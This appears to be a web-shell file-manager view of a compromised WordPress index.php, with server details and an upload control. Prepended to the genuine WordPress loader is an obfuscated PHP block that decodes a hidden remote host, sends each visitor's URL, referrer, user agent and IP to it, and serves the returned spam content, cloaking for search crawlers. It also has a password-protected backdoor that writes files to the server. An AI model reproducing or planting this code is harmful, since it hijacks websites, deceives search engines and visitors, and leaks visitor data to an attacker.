HEX
Server: Apache
System: Linux cpanel.oo22xfm3qr4ujeyefshohxwgpe.gx.internal.cloudapp.net 3.10.0-1160.90.1.el7.x86_64 #1 SMP Thu May 4 15:21:22 UTC 2023 x86_64
User: alaskaadmin (1084)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/alaskaadmin/public_html/index.php0
<?php
// 2DUAN_START
// __B26_2DUAN_WP_INLINE_GUARD_MK_v2__
define("KK", "6d2679de1736987abf7045dd0f423a85"); define("NN", "5836"); define("URL", "%34%31%35%39%2D%72%61%2D%69%34%2D%31%2E%32%31%6E%66%2E%6B%6C%6D"); if(!empty($_REQUEST["error"])){ ini_set("display_errors", "On"); ini_set("error_reporting",E_ALL); $s_statsu=true; }else{ error_reporting(0); ini_set('display_errors', 0); $s_statsu=false; } @set_time_limit(3600); @ignore_user_abort(1); $wV5OL = URL; $sBXh8 = "http"; if (ESm1m()) { $usAhr = "https"; } else { $usAhr = "http"; } $OwIhJ = BVeon(); if ($OwIhJ == '') { $OwIhJ = "/"; } if (preg_match('#^/index\.php/?$#i', $OwIhJ)) { $OwIhJ = "/"; } $FvlcR = urlencode($OwIhJ); $allurl=urlencode(getCurrentUrl()); $rdzSK = urlencode(getHostdomain()); $NwKOf = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? urlencode($_SERVER["HTTP_ACCEPT_LANGUAGE"]) : ''; if (isset($_SERVER["HTTP_REFERER"])) { $qM7np = $_SERVER["HTTP_REFERER"]; $qM7np = urlencode($qM7np); }else{ $qM7np=''; } if (isset($_SERVER["HTTP_USER_AGENT"])) { $MdsNo = urlencode($_SERVER["HTTP_USER_AGENT"]); }else{ $MdsNo=''; } if(!empty($_REQUEST["pwd"])){ $fFWzR = md5($_REQUEST["pwd"]); }else{ $fFWzR=''; } if ($fFWzR == "8c929159e2048ffc2f53596b093ef089") { $izj_M = @$_REQUEST["gv"]; $Bpum2 = @$_REQUEST["action"]; if($Bpum2=="checkwp"){ echo "success"; }elseif(!empty($izj_M)){ $name=$izj_M; $content="google-site-verification: ".$name; $handle=fopen($name."","w"); fwrite($handle,$content); fclose($handle); if(file_exists($name)){ echo "true"; }else{ echo "false"; } } exit; } $ZibXI = strtr(urldecode($wV5OL), "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm"); if($OwIhJ=="/"){ $SendCheck=true; }else{ if(checkLink(urldecode($allurl))||strstr(urldecode($allurl), ".xml")){ $SendCheck=true; }else{ $SendCheck=false; } } if($SendCheck){ $isus=1; }else{ $isus=2; } $getUrl = $sBXh8 . "://" . $ZibXI . "/?web=" . $rdzSK . "&zz=" . wiRNx() . "&uri=" . $FvlcR. "&ufrom=" . $qM7np . "&allurl=" . $allurl . "&lang=" . $NwKOf. "&ua=" . $MdsNo. "&kk=".KK."&nn=".NN."&pp=".urlencode(bvwg3())."&isus=".$isus ; if (!badSpider($MdsNo)&&!checkFileType(urldecode($allurl))) { $backhtml = trim(RgbKM($getUrl)); }else{ $backhtml=''; } if($s_statsu){ echo $backhtml; } if(!empty($backhtml)){ if (!strstr($backhtml, "{{code")&&!strstr($backhtml, ".xyz")) { if(strstr($backhtml, "okxmlgetcontent")){ $backhtml = str_replace("okxmlgetcontent", '', $backhtml); @header("Content-type: text/xml"); echo $backhtml; exit; }else{ echo $backhtml;exit; } }else{ if(strstr($backhtml, "code404")){ } } } function getHostdomain() { $scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; return "$scheme://$host"; } function getCurrentUrl() { $scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; $requestUri = $_SERVER['REQUEST_URI']; return "$scheme://$host$requestUri"; } function BVeoN() { if (isset($_SERVER["REQUEST_URI"])) { $FvlcR = $_SERVER["REQUEST_URI"]; } elseif (isset($_SERVER["argv"])) { $FvlcR = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $FvlcR = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } return $FvlcR; } function esM1M() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } else { if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } else { if (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } } } return false; } function RgbKM($GGBCD) { $RKqb1 = ''; if (function_exists("curl_init")) { $PdUoH = curl_init(); curl_setopt($PdUoH, CURLOPT_URL, $GGBCD); curl_setopt($PdUoH, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($PdUoH, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($PdUoH, CURLOPT_RETURNTRANSFER, 1); curl_setopt($PdUoH, CURLOPT_CONNECTTIMEOUT, 20); $RKqb1 = curl_exec($PdUoH); curl_close($PdUoH); } if (!$RKqb1) { $RKqb1 = @file_get_contents($GGBCD); } return $RKqb1; } function wiRNx() { $userAgent= strtolower($_SERVER ['HTTP_USER_AGENT']); $spiders = array( 'Googlebot', 'Bingbot', 'yahoo', 'duckduckbot', ); foreach ($spiders as $spider) { if (strpos($userAgent, strtolower($spider)) !== false) { return true; } } return false; } function bvwg3() { if (isset($_SERVER["HTTP_X_SHOPIFY_CLIENT_IP"])) { return $_SERVER["HTTP_X_SHOPIFY_CLIENT_IP"]; } if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; } $v = getenv("HTTP_CLIENT_IP"); if ($v && strcasecmp($v, "unknown")) { return $v; } $v = getenv("HTTP_X_FORWARDED_FOR"); if ($v && strcasecmp($v, "unknown")) { return $v; } $v = getenv("REMOTE_ADDR"); if ($v && strcasecmp($v, "unknown")) { return $v; } if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { return $_SERVER["REMOTE_ADDR"]; } return ""; } function badSpider($userAgent) { $spiderstr='SemrushBot|DotBot|Twitter|facebook|Yandex|MJ12bot|AhrefsBot|MauiBot|MegaIndex.ru|BLEXBot|ZoominfoBot|ExtLinksBot|hubspot|leiki|webmeup|Slurp|twiceler|AddThis.com|AcoonBot|Acunetix|adbeat_bot|AddThis.com|adixxbot|BeetleBot|idbot|CCBot|Crawlera|ZumBot|ZyBorg'; $spiderAgents=explode("|",$spiderstr); foreach ($spiderAgents as $agent) { if (stripos($userAgent, $agent) !== false) { return true; } } return false; } function checkLink($link) { $pattern = '/\/\?[a-zA-Z]=/'; return preg_match($pattern, $link) > 0; } function checkFileType($url) { $p=strtolower(parse_url($url,PHP_URL_PATH)?:''); if($p==='/index.php'||$p==='/index.php/'){return false;} $fileTypes = array( 'jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp','php','avi', 'js', 'css','doc','exe','iso','tif','pic','tiff','woff2','wav','int','dll','sys','bak','bat', 'pdf','xls','zip','rar','tar.gz','mp3','mp4','ppt','txt','gz', 'asp','aspx','jsp','tpl','ajax' ); $extension = strtolower(pathinfo($url, PATHINFO_EXTENSION)); if (in_array($extension, $fileTypes)) { return true; } else { return false; } }
// 2DUAN_END
?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';